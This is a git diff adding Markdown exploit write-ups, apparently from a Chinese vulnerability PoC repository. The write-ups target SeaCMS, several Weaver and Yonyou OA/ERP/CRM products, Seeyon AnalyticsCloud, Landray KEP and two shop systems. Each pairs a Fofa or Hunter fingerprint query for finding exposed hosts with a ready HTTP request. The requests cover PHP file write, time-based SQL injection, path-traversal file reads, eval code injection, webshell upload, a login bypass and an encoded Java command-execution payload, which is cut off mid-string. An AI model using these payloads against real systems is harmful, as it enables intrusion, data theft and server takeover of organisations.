"b/\346\213\274\345\233\242\351\233\266\345\224\256\345\225\206\345\237\216\347\263\273\347\273\237\345\211\215\345\217\260\344\273\273\346\204\217\346\226\207\344\273\266\345\206\231\345\205\245\346\274\217\346\264\236.md" new file mode 100644 index 0000000..fd0816f --- /dev/null +++ "b/\346\213\274\345\233\242\351\233\266\345\224\256\345\225\206\345\237\216\347\263\273\347\273\237\345\211\215\345\217\260\344\273\273\346\204\217\346\226\207\344\273\266\345\206\231\345\205\245\346\274\217\346\264\236.md" @@ -0,0 +1,43 @@ +# 拼团零售商城系统前台任意文件写入漏洞 + +**ThinkPHP5 拼团拼购系统,支持热门商品,余额总览,红包分销,商品销售,购物车等功能,后台使用管理系统所构建;该漏洞利用需要普通用户登录权限** + +## Fofa + +```yaml +"/public/static/plugins/zepto/dist/zepto.js" +``` + +## poc + +```yaml +POST /home/user/avatar HTTP/1.1 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br, zstd +Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 +Cache-Control: max-age=0 +Connection: keep-alive +Content-Length: 65 +Content-Type: application/x-www-form-urlencoded +Cookie: PHPSESSID=kplfq401bdcmql31vr7jp2s6ul; user_id=1; uname=%25E5%2588%2598%25E6%2580%25BB +Host: 127.0.0.1 +Origin: http://127.0.0.1 +Referer: http://127.0.0.1/home +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: none +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 +sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="126", "Google Chrome";v="126" +sec-ch-ua-mobile: ?0 +sec-ch-ua-platform: "Windows" +sec-fetch-user: ?1 + +base64=data:image/php;base64,PD9waHAgcGhwaW5mbygpOw== +``` + +![image-20240720125113160](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407201251370.png) + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/ZjuanRwJzZvgJhJARdq1jg \ No newline at end of file diff --git "a/\346\237\220\350\207\252\345\212\250\345\217\221\345\215\241\347\275\221alipay_notify.php\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" "b/\346\237\220\350\207\252\345\212\250\345\217\221\345\215\241\347\275\221alipay_notify.php\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" new file mode 100644 index 0000000..2e041bd --- /dev/null +++ "b/\346\237\220\350\207\252\345\212\250\345\217\221\345\215\241\347\275\221alipay_notify.php\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" @@ -0,0 +1,47 @@ +# 某自动发卡网alipay_notify.php存在SQL注入漏洞 + +**位于** **/shop/alipay_notify.php 中** **post直接传入out_trade_no,并且直接拼接进语句导致前台SQL注入** + +## fofa + +```javascript +"template/t1/assets/js/odometer.min.js" +``` + +![image-20240716201017098](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407162010214.png) + +## poc + +```javascript +POST /shop/alipay_notify.php HTTP/2 +Host: 127.0.0.1 +Cookie: PHPSESSID=audck4dekct1clpgrqfcunre66 +Content-Length: 14 +Cache-Control: max-age=0 +Sec-Ch-Ua: "Not/A)Brand";v="8", "Chromium";v="126", "Google Chrome";v="126" +Sec-Ch-Ua-Mobile: ?0 +Sec-Ch-Ua-Platform: "Windows" +Upgrade-Insecure-Requests: 1 +Origin: http://127.0.0.1 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Sec-Fetch-Site: none +Sec-Fetch-Mode: navigate +Sec-Fetch-Dest: document +Referer: http://127.0.0.1/shop/alipay_notify.php +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 +Sec-Fetch-User: ?1 +Priority: u=0, i + +out_trade_no=' AND (SELECT 4286 FROM (SELECT(SLEEP(5)))ztQX)-- rLAn +``` + +![image-20240716201023750](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407162010821.png) + + + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/ovB7d4ePnGmCEg-F1k3ZGg \ No newline at end of file diff --git "a/\346\263\233\345\276\256E-office-10\346\216\245\345\217\243leave_record.php\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" "b/\346\263\233\345\276\256E-office-10\346\216\245\345\217\243leave_record.php\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" new file mode 100644 index 0000000..78f4692 --- /dev/null +++ "b/\346\263\233\345\276\256E-office-10\346\216\245\345\217\243leave_record.php\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" @@ -0,0 +1,24 @@ +# 泛微E-office-10接口leave_record.php存在SQL注入漏洞 + +泛微eoffice10协同办公平台是一款专业的office办公的工具软件。软件支持在线多人编辑文件,并且会在第一时间收发协作需求。十分方便快捷,界面简约,布局直观清晰,操作简单,极易上手,是一款不可多得的利器。泛微E-office 10 leave_record存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息甚至getshell。 + +## hunter + +```yaml +web.body="eoffice10"&&web.body="eoffice_loading_tip" +``` + +## poc + +```yaml +GET /eoffice10/server/ext/system_support/leave_record.php?flow_id=1%27+AND+%28SELECT+4196+FROM+%28SELECT%28SLEEP%285%29%29%29LWzs%29+AND+%27zfNf%27%3D%27zfNf&run_id=1&table_field=1&table_field_name=user()&max_rows=10 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407171255148.png) \ No newline at end of file diff --git "a/\346\263\233\345\276\256e-cology9\346\216\245\345\217\243XmlRpcServlet\345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\350\257\273\345\217\226\346\274\217\346\264\236.md" "b/\346\263\233\345\276\256e-cology9\346\216\245\345\217\243XmlRpcServlet\345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\350\257\273\345\217\226\346\274\217\346\264\236.md" new file mode 100644 index 0000000..9cc4884 --- /dev/null +++ "b/\346\263\233\345\276\256e-cology9\346\216\245\345\217\243XmlRpcServlet\345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\350\257\273\345\217\226\346\274\217\346\264\236.md" @@ -0,0 +1,54 @@ +# 泛微e-cology9接口XmlRpcServlet存在任意文件读取漏洞 + +泛微e-cology是一款由泛微网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能管理和移动办公。泛微e-cology XmlRpcServlet存在任意文件读取漏洞,攻击者可通过该漏洞获取敏感信息 + +## hunter + +```yaml +app.name=="泛微 e-cology 9.0 OA" +``` + +## poc + +```yaml +POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1 +Host: {hostname} +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +Content-Type: application/xml +Accept-Encoding: gzip +Content-Length: 201 + + + +WorkflowService.getAttachment + + +c://windows/win.ini + + + +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407171252023.png) + +### 获取数据库连接信息 + +```yaml +POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1 +Host: {hostname} +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +Content-Type: application/xml +Accept-Encoding: gzip +Content-Length: 201 + + + +WorkflowService.LoadTemplateProp + + +weaver + + + +``` + diff --git "a/\346\265\267\346\264\213CMS\345\220\216\345\217\260admin_smtp.php\345\255\230\345\234\250\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214\346\274\217\346\264\236.md" "b/\346\265\267\346\264\213CMS\345\220\216\345\217\260admin_smtp.php\345\255\230\345\234\250\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214\346\274\217\346\264\236.md" new file mode 100644 index 0000000..768d9df --- /dev/null +++ "b/\346\265\267\346\264\213CMS\345\220\216\345\217\260admin_smtp.php\345\255\230\345\234\250\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214\346\274\217\346\264\236.md" @@ -0,0 +1,38 @@ +# 海洋CMS后台admin_smtp.php存在远程代码执行漏洞 + +SeaCMS 12.9存在远程代码执行漏洞。该漏洞是由于admin_smtp.php将用户输入的数据未经处理直接拼接写入weixin.php造成的,允许经过身份验证的攻击者利用该漏洞执行任意命令并获取系统权限。 + +## fofa + +```yaml +app="海洋CMS" +``` + +## poc + +```yaml +POST /at1fcg/admin_smtp.php?action=set HTTP/1.1 +Host: 127.0.0.12 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +Content-Type: application/x-www-form-urlencoded +Content-Length: 192 +Origin: http://127.0.0.12 +Connection: close +Referer: http://127.0.0.12/at1fcg/admin_smtp.php +Cookie: PHPSESSID=rcejd2jps1jcrv8gdoumqmf71k +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: iframe +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Sec-Fetch-User: ?1 +Priority: u=4 + +smtpserver=${eval($_POST[1])}&smtpserverport=&smtpusermail=12345%40qq.com&smtpname=%E6%B5%B7%E6%B4%8B%E5%BD%B1%E8%A7%86%E7%BD%91&smtpuser=12345%40qq.com&smtppass=123456789&smtpreg=off&smtppsw= +``` + +![QQ截图20240703085443-3](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407191152600.png) + +![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407191152599.png) \ No newline at end of file diff --git "a/\347\224\250\345\217\213CRM\345\256\242\346\210\267\345\205\263\347\263\273\347\256\241\347\220\206\347\263\273\347\273\237import.php\345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\344\270\212\344\274\240\346\274\217\346\264\236.md" "b/\347\224\250\345\217\213CRM\345\256\242\346\210\267\345\205\263\347\263\273\347\256\241\347\220\206\347\263\273\347\273\237import.php\345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\344\270\212\344\274\240\346\274\217\346\264\236.md" new file mode 100644 index 0000000..9aa7d70 --- /dev/null +++ "b/\347\224\250\345\217\213CRM\345\256\242\346\210\267\345\205\263\347\263\273\347\256\241\347\220\206\347\263\273\347\273\237import.php\345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\344\270\212\344\274\240\346\274\217\346\264\236.md" @@ -0,0 +1,44 @@ +# 用友CRM客户关系管理系统import.php存在任意文件上传漏洞 + +用友CRM客户关系管理系统import.php存在任意文件上传漏洞,未经身份验证的攻击者通过漏洞上传webshell文件,从而获取到服务器权限。 + +## hunter + +```yaml +app.name="用友 CRM" +``` + +## fofa + +```yaml +body="用友U8CRM" +``` + +## poc + +```yaml +POST /crmtools/tools/import.php?DontCheckLogin=1&issubmit=1 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 +Content-Length: 277 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +Content-Type: multipart/form-data; boundary=----WebKitFormBoundarye0z8QbHs79gL8vW5 +Upgrade-Insecure-Requests: 1 + +------WebKitFormBoundarye0z8QbHs79gL8vW5 +Content-Disposition: form-data; name="xfile"; filename="11.xls" + + +------WebKitFormBoundarye0z8QbHs79gL8vW5 +Content-Disposition: form-data; name="combo" + +help.php +------WebKitFormBoundarye0z8QbHs79gL8vW5-- +``` + +![image-20240719191343917](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407191913006.png) + +文件路径:`http://ip/tmpfile/help.php` \ No newline at end of file diff --git "a/\347\224\250\345\217\213GRP-A-Cloud\346\224\277\345\272\234\350\264\242\345\212\241\344\272\221\347\263\273\347\273\237\346\216\245\345\217\243selectGlaDatasourcePreview\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" "b/\347\224\250\345\217\213GRP-A-Cloud\346\224\277\345\272\234\350\264\242\345\212\241\344\272\221\347\263\273\347\273\237\346\216\245\345\217\243selectGlaDatasourcePreview\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" new file mode 100644 index 0000000..e308b81 --- /dev/null +++ "b/\347\224\250\345\217\213GRP-A-Cloud\346\224\277\345\272\234\350\264\242\345\212\241\344\272\221\347\263\273\347\273\237\346\216\245\345\217\243selectGlaDatasourcePreview\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" @@ -0,0 +1,29 @@ +# 用友GRP-A-Cloud政府财务云系统接口selectGlaDatasourcePreview存在SQL注入漏洞 + +用友政务软件有限公司由用友(集团)和中国财政科学研究院共同设立,是面向政府部门、事业单位、非营利组织的全方位业务管理信息化解决方案提供商,是中国电子政务百强企业、中国领先的公共财政管理软件提供商、中国领先的行政事业单位计划财务管理软件提供商。公司的业务涵盖财政、银行、税务、社保、民生、公安、交通、海关、国土资源等行业。用友GRP A++Cloud政府财务云exe_sql存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。 + +## fofa + +```yaml +body="/pf/portal/login/css/fonts/style.css" +``` + + +## poc + +```yaml +POST /gla/dataSource/selectGlaDatasourcePreview HTTP/1.1 +Host: {hostname} +Content-Length: 279 +Accept: */* +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close + +exe_sql=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (2867=2867) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(118)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL)&pageNumber=1&pageSize=10&exe_param=11,1,11,1,11,1 +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407171258885.png) \ No newline at end of file diff --git "a/\347\224\250\345\217\213NC-Cloud\346\226\207\344\273\266\346\234\215\345\212\241\345\231\250\347\224\250\346\210\267\347\231\273\351\231\206\347\273\225\350\277\207\346\274\217\346\264\236.md" "b/\347\224\250\345\217\213NC-Cloud\346\226\207\344\273\266\346\234\215\345\212\241\345\231\250\347\224\250\346\210\267\347\231\273\351\231\206\347\273\225\350\277\207\346\274\217\346\264\236.md" new file mode 100644 index 0000000..b3a4bbd --- /dev/null +++ "b/\347\224\250\345\217\213NC-Cloud\346\226\207\344\273\266\346\234\215\345\212\241\345\231\250\347\224\250\346\210\267\347\231\273\351\231\206\347\273\225\350\277\207\346\274\217\346\264\236.md" @@ -0,0 +1,19 @@ +# 用友NC-Cloud文件服务器用户登陆绕过漏洞 + + 用友NC Cloud大型企业数字化平台,深度应用新一代数字智能技术,完全基于云原生架构,打造开放、互联、融合、智能的一体化云平台,聚焦数智化管理、数智化经营、数智化商业等三大企业数智化转型战略方向,提供涵盖数字营销、财务共享、全球司库、智能制造、敏捷供应链、人才管理、智慧协同等18大解决方案,帮助大型企业全面落地数智化。用友NC-Cloud文件服务器存在一个权限绕过漏洞。 + +## fofa + +```yaml +app="用友-NC-Cloud" +``` + +## poc + +访问/fs/出现如下页面,代表漏洞存在 + +![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407171304499.webp) + +输入任意用户名+密码登录,将登入时的数据进行抓包拦截其响应包,并将false值,修改成true放行即可成功绕过登录认证。 + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407171305886.png) \ No newline at end of file diff --git "a/\350\207\264\350\277\234\344\272\222\350\201\224AnalyticsCloud\345\210\206\346\236\220\344\272\221\345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\350\257\273\345\217\226\346\274\217\346\264\236.md" "b/\350\207\264\350\277\234\344\272\222\350\201\224AnalyticsCloud\345\210\206\346\236\220\344\272\221\345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\350\257\273\345\217\226\346\274\217\346\264\236.md" new file mode 100644 index 0000000..2323a39 --- /dev/null +++ "b/\350\207\264\350\277\234\344\272\222\350\201\224AnalyticsCloud\345\210\206\346\236\220\344\272\221\345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\350\257\273\345\217\226\346\274\217\346\264\236.md" @@ -0,0 +1,31 @@ +## 致远互联AnalyticsCloud分析云存在任意文件读取漏洞 + +北京致远互联软件股份有限公司AnalyticsCloud分析云存在任意文件读取漏洞,未经身份认证的攻击者可以利用此漏洞读取系统内部敏感文件,获取敏感信息。 + +## fofa + +```yaml +title="AnalyticsCloud 分析云" +``` + +## hunter + +```yaml +web.title="AnalyticsCloud 分析云" +``` + +## poc + +```yaml +GET /a/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/c:/windows/win.ini HTTP/1.1 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cache-Control: max-age=0 +Connection: keep-alive +Host: your-ip +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 +``` + +![image-20240719114011759](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407191140011.png) \ No newline at end of file diff --git "a/\350\223\235\345\207\214KEP\345\211\215\345\217\260RCE\346\274\217\346\264\236.md" "b/\350\223\235\345\207\214KEP\345\211\215\345\217\260RCE\346\274\217\346\264\236.md" new file mode 100644 index 0000000..5e067d8 --- /dev/null +++ "b/\350\223\235\345\207\214KEP\345\211\215\345\217\260RCE\346\274\217\346\264\236.md" @@ -0,0 +1,56 @@ +# 蓝凌KEP前台RCE漏洞 + +## fofa + +``` +app="Landray-OA系统" +``` + +## poc + +copy文件 + +```yaml +POST /sys/ui/sys_ui_component/sysUiComponent.do HTTP/1.1 +Host: xx.xx.xx.xx +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 +Connection: close +Content-Length: 401 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryL7ILSpOdIhIIvL51 +Origin: http://www.baidu.com +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +X-Requested-With: XMLHttpRequest + +------WebKitFormBoundaryL7ILSpOdIhIIvL51 +Content-Disposition: form-data; name="method" + +replaceExtend +------WebKitFormBoundaryL7ILSpOdIhIIvL51 +Content-Disposition: form-data; name="extendId" + +../../../../resource/help/km/review/ +------WebKitFormBoundaryL7ILSpOdIhIIvL51 +Content-Disposition: form-data; name="folderName" + +../../../ekp/sys/common +------WebKitFormBoundaryL7ILSpOdIhIIvL51-- +``` + +![image-20240715104927859](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407152016346.png) + +上传文件 + +```yaml +POST /resource/help/km/review/dataxml.jsp HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 +Connection: close +Content-Type: application/x-www-form-urlencoded +Cmd: id + +s_bean=ruleFormulaValidate&script=\u0020\u0020\u0020\u0020\u0062\u006f\u006f\u006c\u0065\u0061\u006e\u0020\u0066\u006c\u0061\u0067\u0020\u003d\u0020\u0066\u0061\u006c\u0073\u0065\u003b\u0054\u0068\u0072\u0065\u0061\u0064\u0047\u0072\u006f\u0075\u0070\u0020\u0067\u0072\u006f\u0075\u0070\u0020\u003d\u0020\u0054\u0068\u0072\u0065\u0061\u0064\u002e\u0063\u0075\u0072\u0072\u0065\u006e\u0074\u0054\u0068\u0072\u0065\u0061\u0064\u0028\u0029\u002e\u0067\u0065\u0074\u0054\u0068\u0072\u0065\u0061\u0064\u0047\u0072\u006f\u0075\u0070\u0028\u0029\u003b\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u002e\u0046\u0069\u0065\u006c\u0064\u0020\u0066\u0020\u003d\u0020\u0067\u0072\u006f\u0075\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u0054\u0068\u0072\u0065\u0061\u0064\u005b\u005d\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u0020\u003d\u0020\u0028\u0054\u0068\u0072\u0065\u0061\u0064\u005b\u005d\u0029\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0067\u0072\u006f\u0075\u0070\u0029\u003b\u0066\u006f\u0072\u0020\u0028\u0069\u006e\u0074\u0020\u0069\u0020\u003d\u0020\u0030\u003b\u0020\u0069\u0020\u003c\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u003b\u0020\u0069\u002b\u002b\u0029\u0020\u007b\u0020\u0074\u0072\u0079\u0020\u007b\u0020\u0054\u0068\u0072\u0065\u0061\u0064\u0020\u0074\u0020\u003d\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u005b\u0069\u005d\u003b\u0069\u0066\u0020\u0028\u0074\u0020\u003d\u003d\u0020\u006e\u0075\u006c\u006c\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0073\u0074\u0072\u0020\u003d\u0020\u0074\u002e\u0067\u0065\u0074\u004e\u0061\u006d\u0065\u0028\u0029\u003b\u0069\u0066\u0020\u0028\u0073\u0074\u0072\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0065\u0078\u0065\u0063\u0022\u0029\u0020\u007c\u007c\u0020\u0021\u0073\u0074\u0072\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0068\u0074\u0074\u0070\u0022\u0029\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0066\u0020\u003d\u0020\u0074\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0061\u0072\u0067\u0065\u0074\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0074\u0029\u003b\u0069\u0066\u0020\u0028\u0021\u0028\u006f\u0062\u006a\u0020\u0069\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u006f\u0066\u0020\u0052\u0075\u006e\u006e\u0061\u0062\u006c\u0065\u0029\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0068\u0069\u0073\u0024\u0030\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0068\u0061\u006e\u0064\u006c\u0065\u0072\u0022\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u0046\u0069\u0065\u006c\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0068\u0061\u006e\u0064\u006c\u0065\u0072\u0022\u0029\u003b\u0020\u007d\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0067\u006c\u006f\u0062\u0061\u006c\u0022\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u0046\u0069\u0065\u006c\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0067\u006c\u006f\u0062\u0061\u006c\u0022\u0029\u003b\u0020\u007d\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0066\u0020\u003d\u0020\u006f\u0062